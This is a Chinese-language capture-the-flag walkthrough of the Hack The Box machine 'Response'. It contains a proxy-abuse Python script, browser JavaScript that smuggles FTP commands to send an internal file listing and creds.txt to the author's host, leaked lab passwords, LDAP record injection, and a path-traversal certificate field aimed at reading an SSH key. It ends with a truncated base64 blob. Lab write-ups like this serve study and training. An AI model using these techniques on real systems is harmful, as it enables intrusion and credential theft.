Box Info#
| Name |  Response |
|---|---|
| Difficulty: | Insane |
| Points: | 50 |
| Release: | 14 May 2022 |
| IP: | 10.10.11.163 |
| OS: | Linux |
| Radar Graph: |  |
实战#
信息收集#
端口扫描#
┌──(kali㉿kali)-[~/HTB]
└─$ rustscan -a 10.10.11.163
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.163:22
Open 10.10.11.163:80
┌──(kali㉿kali)-[~/HTB]
└─$ nmap -sC -sV -p22,80 10.10.11.163
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-15 03:54 EST
Nmap scan report for 10.10.11.163
Host is up (0.082s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e9a4394afb065d5782fc4a0e0be46b25 (RSA)
| 256 a323e498dfb6911bf2ac2f1cc1469b15 (ECDSA)
|_ 256 fb105fda55a66b953df2e85c0336ff31 (ED25519)
80/tcp open http nginx 1.21.6
|_http-title: Did not follow redirect to http://www.response.htb
|_http-server-header: nginx/1.21.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.44 seconds
目录扫描#
80 端口显示了一个网页
gobuster 跑一下
┌──(kali㉿kali)-[~/HTB]
└─$ gobuster dir -u http://www.response.htb -w ~/wordlist/SecLists/Discovery/Web-Content/raft-medium-directories.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://www.response.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/kali/wordlist/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/15 04:02:42 Starting gobuster in directory enumeration mode
===============================================================
/css (Status: 301) [Size: 169] [--> http://www.response.htb/css/]
/img (Status: 301) [Size: 169] [--> http://www.response.htb/img/]
/assets (Status: 301) [Size: 169] [--> http://www.response.htb/assets/]
/fonts (Status: 301) [Size: 169] [--> http://www.response.htb/fonts/]
/status (Status: 301) [Size: 169] [--> http://www.response.htb/status/]
assets 和 status 里可能有东西,再跑一下
assets 403
经过 Base64 转换得到结果
{"servers":[{"id":1,"ip":"127.0.0.1","name":"Test Server"}]}
那么拿 status/main.js.php 中的 get_chat_status 尝试一下
得到结果 {"status":"running","vhost":"chat.response.htb"}
用户权限#
得到了 chat.response.htb 之后无论是添加 hosts 记录还是直接访问都无法打开网页,那么尝一下通过之前 json 格式的设置。
并且用 api.response.htb 做跳板
{"api_version":"1.0","endpoints":[{"desc":"get api status","method":"GET","route":"/"},{"desc":"get internal chat status","method":"GET","route":"/get_chat_status"},{"desc":"get monitored servers list","method":"GET","route":"/get_servers"}],"status":"running"}
写个 python 脚本
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
import random
import re
import requests
from socketserver import ThreadingMixIn
import sys
import threading
import time
hostName = "0.0.0.0"
serverPort = 80
class MyServer(BaseHTTPRequestHandler):
def do_GET(self):
self.request_handler('GET')
def do_POST(self):
self.request_handler('POST')
def request_handler(self, method):
self.random_number = random.randint(100000,999999)
path = self.path
myurl = 'http://chat.response.htb' + path
print(f"[{self.random_number}] {method} {myurl}")
if method == 'POST':
content_len = int(self.headers.get('Content-Length'))
post_body = self.rfile.read(content_len)
print(f"[{self.random_number}] body: {post_body}")
else:
post_body = None
digest = self.get_digest(myurl)
data = self.send_request_to_proxy(myurl, method, digest, post_body)
self.send_response(200)
if path.endswith('.js'):
self.send_header("Content-type", "application/javascript")
elif path.endswith('.css'):
self.send_header("Content-type", "text/css")
else:
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(data)
def get_digest(self, myurl):
url = 'http://www.response.htb/status/main.js.php'
cookies = {'PHPSESSID': myurl}
response = requests.get(url, cookies=cookies)
response.raise_for_status()
assert 'session_digest' in response.text
session_digest = re.search(r'\'session_digest\':\'([^\']+)', response.text).group(1)
#print(f"[{self.random_number}] digest: {session_digest}")
return session_digest
def send_request_to_proxy(self, myurl, method, digest, body=None):
url = 'http://proxy.response.htb/fetch'
data = {'url': myurl,
'url_digest': digest,
'method': method,
'session': '1a5455b829845168770cb337f1a05507',
'session_digest': 'd27e297b494df599e72985e6e9a166751d7de74136df9d74468aac0818c29125'}
if method == 'POST':
data['body'] = base64.b64encode(body)
response = requests.post(url, json=data)
response.raise_for_status()
assert 'body' in response.text and 'status_code' in response.text
body = response.json()['body']
status_code = response.json()['status_code']
print(f"[{self.random_number}] status_code from proxy: {status_code}; length of body: {len(body)}")
decoded_string = base64.b64decode(body)
return decoded_string
# This part is for multithreaing.
# See https://stackoverflow.com/questions/14088294/multithreaded-web-server-in-python
# Multithreading is necessary because a lot of requests are made when opening the chat application.
# Some requests take several seconds to complete. I don't want these requests to hold back the other ones.
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def main():
print("Edit your /etc/hosts like this:")
print("10.10.11.163 www.response.htb proxy.response.htb # HTB machine IP")
print("10.10.16.29 chat.response.htb # my VPN IP")
print("While runing this script, open http://chat.response.htb/ in the web browser\n")
# Without multithreading:
#webServer = HTTPServer((hostName, serverPort), MyServer)
# With multithreading (choose one or the other):
webServer = ThreadedHTTPServer((hostName, serverPort), MyServer)
print("Server started http://%s:%s" % (hostName, serverPort))
try:
webServer.serve_forever()
except KeyboardInterrupt:
pass
webServer.server_close()
print("Server stopped.")
if __name__ == "__main__":
main()
打开网页后发现
下载后查询 README.md
配置文件在 server 中的 index.js
仅存的员工聊聊天
Idap 服务#
安装
sudo apt install slapd
配置
sudo dpkg-reconfigure slapd
选择 no
填入response.htb
organization name: response
然后创建一个 Idif file
dn: ou=users,dc=response,dc=htb
changetype: add
objectClass: organizationalPerson
sn:test
cn:test
dn: uid=admin,ou=users,dc=response,dc=htb
changetype: add
objectClass: inetOrgPerson
userPassword: password
sn: test
cn: test
启动服务
service slapd start
ldapadd -x -D "cn=admin,dc=response,dc=htb" -w 'password' -H ldap://127.0.0.1 -f group.ldif
FTP#
聊完天给了我们线索
(yourself)
ok
bob
awesome!
i moved the internal ftp server... the new ip address is 172.18.0.2 and it is listening on port 2121. the creds are ftp_user / Secret12345
outgoing traffic from the server is currently allowed, but i will adjust the firewall to fix that
btw. would be great if you could send me the javascript article you were talking about
172.18.0.2 2121 ftp_user Secret12345
创建一个 html,为什么要创建可以看这篇文章👉 https://www.serv-u.com/resources/tutorial/pasv-response-epsv-port-pbsz-rein-ftp-command
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://172.18.0.2:2121/',true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE &&
this.status === 200) {
}
}
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,29,10,15\r\nLIST\r\n");
</script>
本机 ip 就是 10,10,16,29
10,15 意味着 10*256+15=2575
然后运行
python3 -m http.server 9001
nc -lvnp 2575
之前 bob 不是找 admin 有事么,发个链接给他(上面的 html 文件命名为 1.html)
http://我的ip:9001/1.html
┌──(kali㉿kali)-[~/HTB]
└─$ nc -lvnp 2575
listening on [any] 2575 ...
connect to [10.10.16.29] from (UNKNOWN) [10.10.11.163] 39036
-rw-r--r-- 1 root root 74 Mar 16 2022 creds.txt
给了我认证信息
那我再修改一下上面的代码
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://172.18.0.2:2121/',true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE &&
this.status === 200) {
}
}
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,29,10,15\r\nRETR creds.txt\r\n");
</script>
得到结果
ftp
---
ftp_user / Secret12345
ssh
---
bob / F6uXVwEjdZ46fsbXDmQK7YPY3OM
ssh 试试
🎉🎉🎉
┌──(kali㉿kali)-[~/HTB]
└─$ ssh [email protected]
The authenticity of host '10.10.11.163 (10.10.11.163)' can't be established.
ED25519 key fingerprint is SHA256:iPHy1XV7afTauFvMhysv/Ynl8yV39A02ZsTLR42/sd0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.163' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)
System load: 1.69
Usage of /: 79.2% of 8.54GB
Memory usage: 29%
Swap usage: 0%
Processes: 287
Users logged in: 0
IPv4 address for br-01fdb3f286b8: 172.19.0.1
IPv4 address for br-feb0146a542b: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.11.163
IPv6 address for eth0: dead:beef::250:56ff:feb9:76ed
Last login: Sun Jan 15 04:14:32 2023 from 10.10.14.10
bob@response:~$ ls
user.txt
bob@response:~$ cat user.txt
cd**************************954
横向移动#
晃了一圈除了用户 scryh 其他没什么可利用的
进入目录
bob@response:/home/scryh$ ls -liah
total 40K
532257 drwxr-xr-x 7 scryh scryh 4.0K Mar 11 2022 .
524290 drwxr-xr-x 4 root root 4.0K Mar 4 2022 ..
532271 lrwxrwxrwx 1 root root 9 Mar 4 2022 .bash_history -> /dev/null
532260 -rw-r--r-- 1 scryh scryh 220 Feb 25 2020 .bash_logout
532259 -rw-r--r-- 1 scryh scryh 3.7K Feb 25 2020 .bashrc
532263 drwx------ 3 scryh scryh 4.0K Mar 4 2022 .cache
565333 drwx------ 3 scryh scryh 4.0K Mar 11 2022 .config
173010 drwx------ 2 scryh scryh 4.0K Mar 16 2022 incident_2022-3-042
532258 -rw-r--r-- 1 scryh scryh 807 Feb 25 2020 .profile
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17 2022 scan
532261 drwx------ 2 scryh scryh 4.0K Mar 10 2022 .ssh
incident 没权限访问,进 scan 看看
bob@response:/home/scryh/scan$ ls -liah
total 28K
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17 2022 .
532257 drwxr-xr-x 7 scryh scryh 4.0K Mar 11 2022 ..
173020 drwxr-xr-x 4 scryh scryh 4.0K Mar 3 2022 data
173289 drwxr-xr-x 2 scryh scryh 4.0K Jan 15 12:23 output
156892 -rwxr-xr-x 1 scryh scryh 3.4K Mar 4 2022 scan.sh
173291 drwxr-xr-x 2 scryh scryh 4.0K Feb 15 2022 scripts
156894 -rwxr-xr-x 1 scryh scryh 1.3K Mar 17 2022 send_report.py
在 scripts 中有三个 nmap 的脚本
bob@response:/home/scryh/scan/scripts$ ls -liah
total 68K
173291 drwxr-xr-x 2 scryh scryh 4.0K Feb 15 2022 .
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17 2022 ..
173292 -rw-r--r-- 1 scryh scryh 9.5K Mar 3 2022 ssl-cert.nse
173293 -rw-r--r-- 1 scryh scryh 39K Feb 15 2022 ssl-enum-ciphers.nse
173294 -rw-r--r-- 1 scryh scryh 7.6K Feb 15 2022 ssl-heartbleed.nse
那么接下去的重点是 nmap 的三个脚本,理解一下脚本的作用,说不定可以把 172.18.0.3 改为我们自己的,这样就可以看出 xml 和 pdf 里面有什么了
local NON_VERBOSE_FIELDS = { "commonName", "organizationName",
"stateOrProvinceName", "countryName" }
-- Test to see if the string is UTF-16 and transcode it if possible
local function maybe_decode(str)
-- If length is not even, then return as-is
if #str < 2 or #str % 2 == 1 then
return str
end
if str:byte(1) > 0 and str:byte(2) == 0 then
-- little-endian UTF-16
return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, false, nil)
elseif str:byte(1) == 0 and str:byte(2) > 0 then
-- big-endian UTF-16
return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, true, nil)
else
return str
end
end
发现有四个参数,一些名称,在 data 文件夹里可以看到
bob@response:/home/scryh/scan/data/countryName$ ls
AD AN AW BF BN BW CG CO CY DZ ET GA GI GS HN IM JE KI KZ LS MD MM MT NA NO PE PN RE SC SK ST TF TN UA VC WS
AE AO AX BG BO BY CH CR CZ EC FI GB GL GT HR IN JM KM LA LT ME MN MU NC NP PF PR RO SD SL SV TG TO UG VE XK
AF AQ AZ BH BQ BZ CI CS DE EE FJ GD GM GU HT IO JO KN LB LU MF MO MV NE NR PG PS RS SE SM SX TH TR UM VG YE
AG AR BA BI BR CA CK CU DJ EG FK GE GN GW HU IQ JP KP LC LV MG MP MW NF NU PH PT RU SG SN SY TJ TT US VI YT
AI AS BB BJ BS CC CL CV DK EH FM GF GP GY ID IR KE KR LI LY MH MQ MX NG NZ PK PW RW SH SO SZ TK TV UY VN ZA
AL AT BD BL BT CD CM CW DM ER FO GG GQ HK IE IS KG KW LK MA MK MR MY NI OM PL PY SA SI SR TC TL TW UZ VU ZM
AM AU BE BM BV CF CN CX DO ES FR GH GR HM IL IT KH KY LR MC ML MS MZ NL PA PM QA SB SJ SS TD TM TZ VA WF ZW
bob@response:/home/scryh/scan/data/countryName$ cat CN
China
bob@response:/home/scryh/scan/data/countryName$ cd ../
bob@response:/home/scryh/scan/data$ cd stateOrProvinceName/
bob@response:/home/scryh/scan/data/stateOrProvinceName$ ls
Alabama Arizona California Florida Hawaii Indiana Maryland Nebraska Some-State Texas Virginia Wisconsin Zion
bob@response:/home/scryh/scan/data/stateOrProvinceName$ cat California
California is a state in the Western United States.
bob@response:/home/scryh/scan/data/stateOrProvinceName$
发现 stateOrProvinceName 的内容比较长,可以构造../../../../.ssh/id_rsa
再看一下 output
bob@response:/home/scryh/scan/output$ cat log.txt
scanning server ip 172.18.0.3
- retrieved manager uid: marie
- manager mail address: [email protected]
- failed to retrieve SMTP server for domain "response-test.htb" locally
- retrieved SMTP server for domain "response-test.htb": mail.response-test.htb.
- retrieved ip address of SMTP server: 172.18.0.3
- sending report output/scan_172.18.0.3.pdf to customer [email protected] via SMTP server 172.18.0.3
跑一下 pspy
2023/01/21 08:31:01 CMD: UID=0 PID=34603 | sudo -u scryh bash -c cd /home/scryh/scan;./scan.sh
2023/01/21 08:31:01 CMD: UID=1000 PID=34605 | /bin/bash ./scan.sh
2023/01/21 08:31:01 CMD: UID=1000 PID=34604 | bash -c cd /home/scryh/scan;./scan.sh
2023/01/21 08:31:01 CMD: UID=1000 PID=34611 | grep ipHostNumber
2023/01/21 08:31:01 CMD: UID=1000 PID=34610 | /bin/bash ./scan.sh
2023/01/21 08:31:01 CMD: UID=1000 PID=34609 | /bin/bash ./scan.sh
2023/01/21 08:31:01 CMD: UID=1000 PID=34612 | cut -d -f2
2023/01/21 08:31:01 CMD: UID=1000 PID=34613 | nmap -v -Pn 172.18.0.3 -p 443 --script scripts/ssl-enum-ciphers,scripts/ssl-cert,scripts/ssl-heartbleed -oX output/scan_172.18.0.3.xml
2023/01/21 08:31:14 CMD: UID=1000 PID=34614 | wkhtmltopdf output/scan_172.18.0.3.xml output/scan_172.18.0.3.pdf
2023/01/21 08:34:15 CMD: UID=1000 PID=34852 | /usr/bin/ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b ou=customers,dc=response,dc=htb (uid=marie)
2023/01/21 08:35:15 CMD: UID=1000 PID=34959 | /usr/bin/env python3 ./send_report.py 172.18.0.3 [email protected] output/scan_172.18.0.3.pdf
2023/01/21 08:35:15 CMD: UID=0 PID=34960 | /bin/bash /root/ldap/restore_ldap.sh
2023/01/21 08:35:15 CMD: UID=0 PID=34961 | cp /root/ldap/data.mdb /root/docker/openldap/data/slapd/database/
2023/01/21 08:35:15 CMD: UID=0 PID=34962 | docker inspect -f {{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}} testserver
2023/01/21 08:35:15 CMD: UID=0 PID=34968 | ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f /root/ldap/testserver.ldif
2023/01/21 08:37:15 CMD: UID=1000 PID=35100 | python3 ./send_report.py 172.18.0.3 [email protected] output/scan_172.18.0.3.pdf
2023/01/21 08:37:15 CMD: UID=0 PID=35101 | /bin/bash /root/ldap/restore_ldap.sh
2023/01/21 08:37:15 CMD: UID=0 PID=35102 | cp /root/ldap/data.mdb /root/docker/openldap/data/slapd/database/
2023/01/21 08:37:15 CMD: UID=0 PID=35103 | docker inspect -f {{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}} testserver
2023/01/21 08:37:15 CMD: UID=0 PID=35109 | ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f /root/ldap/testserver.ldif
拿出命令跑一下,记得补充变量
bob@response:/home/scryh/scan$ bind_dn='cn=admin,dc=response,dc=htb'
bob@response:/home/scryh/scan$ pwd='aU4EZxEAOnimLNzk3'
bob@response:/home/scryh/scan$ /usr/bin/ldapsearch -x -D $bind_dn -w $pwd -s sub -b 'ou=servers,dc=response,dc=htb' '(objectclass=ipHost)'|grep ipHostNumber|cut -d ' ' -f2 #这个命令是scan.sh里的部分命令
172.18.0.3
bob@response:/home/scryh/scan/scripts$ /usr/bin/ldapsearch -x -D $bind_dn -w $pwd -s sub -b 'ou=servers,dc=response,dc=htb' '(objectclass=ipHost)'
# extended LDIF
#
# LDAPv3
# base <ou=servers,dc=response,dc=htb> with scope subtree
# filter: (objectclass=ipHost)
# requesting: ALL
#
# TestServer, servers, response.htb
dn: cn=TestServer,ou=servers,dc=response,dc=htb
objectClass: top
objectClass: ipHost
objectClass: device
cn: TestServer
manager: uid=marie,ou=customers,dc=response,dc=htb
ipHostNumber: 172.18.0.3
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
确认了扫描的是 172.18.0.3
# TestServer, servers, response.htb这部分就是我们要伪造服务所需要注意的地方了
开始伪造
bob@response:~$ vim server.ldif
dn: cn=TestServer2,ou=servers,dc=response,dc=htb
changetype: add
objectClass: top
objectClass: ipHost
objectClass: device
cn: TestServer2
manager: uid=kali,ou=customers,dc=response,dc=htb
ipHostNumber: 10.10.14.78
添加服务
ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f server.ldif
又因为 pspy 扫出来 ipHost 常会重置
所以我们要写一个定时脚本
#!/bin/bash
while [ 1 -eq 1 ]; do
ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f server.ldif
sleep 3
done
chmod +x test.sh
./test.sh &
发现
2023/01/21 10:42:14 CMD: UID=1000 PID=44453 | nmap -v -Pn 10.10.14.78 -p 443 --script scripts/ssl-enum-ciphers,scripts/ssl-cert,scripts/ssl-heartbleed -oX output/scan_10.10.14.78.xml
已经 nmap 在扫了
那么再添加发送邮件的信息
查看一下格式
bob@response:~$ /usr/bin/ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b ou=customers,dc=response,dc=htb '(uid=marie)'
# extended LDIF
#
# LDAPv3
# base <ou=customers,dc=response,dc=htb> with scope subtree# filter: (uid=marie)
# requesting: ALL
#
# marie, customers, response.htb
dn: uid=marie,ou=customers,dc=response,dc=htb
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: mariemail: [email protected]
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
vim adduser.ldif
dn: uid=kali,ou=customers,dc=response,dc=htb
changetype: add
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: kali
mail: [email protected]
ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f adduser.ldif
看一下是否写入
bob@response:~$ ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b ou=customers,dc=response,dc=htb '(uid=kali)'
# extended LDIF
#
# LDAPv3
# base <ou=customers,dc=response,dc=htb> with scope subtree
# filter: (uid=kali)
# requesting: ALL
#
# kali, customers, response.htb
dn: uid=kali,ou=customers,dc=response,dc=htb
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: kali
mail: [email protected]
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
之后还要搭建自己的 https 服务
生成证书
──(kali㉿kali)-[~/HTB/Response]
└─$ openssl genrsa -out server.key 4096
┌──(kali㉿kali)-[~/HTB/Response]
└─$ openssl req -new -key server.key -out server.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:AU
State or Province Name (full name) [Some-State]:../../../.ssh/id_rsa
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:10.10.14.78
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
──(kali㉿kali)-[~/HTB/Response]
└─$ openssl x509 -req -in server.csr -out server.crt -signkey server.key -days 3650
Certificate request self-signature ok
subject=C = AU, ST = ../../../.ssh/id_rsa, O = Internet Widgits Pty Ltd, CN = 10.10.14.78
┌──(kali㉿kali)-[~/HTB/Response]
└─$ cat server.key >> server.crt
#创建https.py
https.py
import http.server, ssl
server_address = ('10.10.14.78',443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
server_side=True,
certfile='server.crt',
ssl_version=ssl.PROTOCOL_TLS)
httpd.serve_forever()
搭建 dns 服务#
sudo docker run -d\
--name dnsmasq \
--restart always \
-p 10.10.14.78:53:53/udp \
-p 10.10.14.78:8080:8080 \
-v /root/dnsmasq.conf:/etc/dnsmasq.conf \
--log-opt "max-size=100m" \
-e "HTTP_USER=admin" \
-e "HTTP_PASS=admin" \
jpillora/dnsmasq
修改 dnsmasq.conf
log-queries
no-resolv
server=1.0.0.1
server=1.1.1.1
strict-order
server=/company/10.0.0.1
address=/reponse-test.htb/10.10.14.78
address=/mail.response-test.htb/10.10.14.78
localmx
mx-host=response-test.htb,mail.response-test.htb,50
搭建 smtp 服务#
git clone https://github.com/ankraft/smtpproxy.git
cd smtpproxy
mv smtpproxy.ini.example smtpproxy.ini
# 修改smtpproxy.ini
[config]
port=25
sleeptime=30
waitafterpop=5
debuglevel=0
deleteonerror=true
[logging]
file=smtpproxy.log
size=1000000
count=10
level=INFO
[[email protected]]
localhostname=response-test.htb
smtphost=10.10.14.78
smtpsecurity=tls
smtpusername=username
smtppassword=password
popbeforesmtp=true
pophost=pop.example.com
popport=995
popssl=true
popusername=username
poppassword=password
popcheckdelay=60
returnpath=[email protected]
[[email protected]>]
use=[email protected]
已经在发 pdf 了
2023/01/21 11:56:12 CMD: UID=1000 PID=53947 | python3 ./send_report.py 172.18.0.3 [email protected] output/scan_172.18.0.3.pdf
python https.py
python2 smtpproxy.py
┌──(root㉿kali)-[~/smtpproxy/msgs]
└─# ls -liah
total 68K
2228303 drwxr-xr-x 2 root root 4.0K Jan 21 07:12 .
2228234 drwxr-xr-x 5 root root 4.0K Jan 21 07:08 ..
2228308 -rw------- 1 root root 60K Jan 21 07:12 tmpbx7ve7.msg
收到了消息(密集恐惧症可不看🙈)
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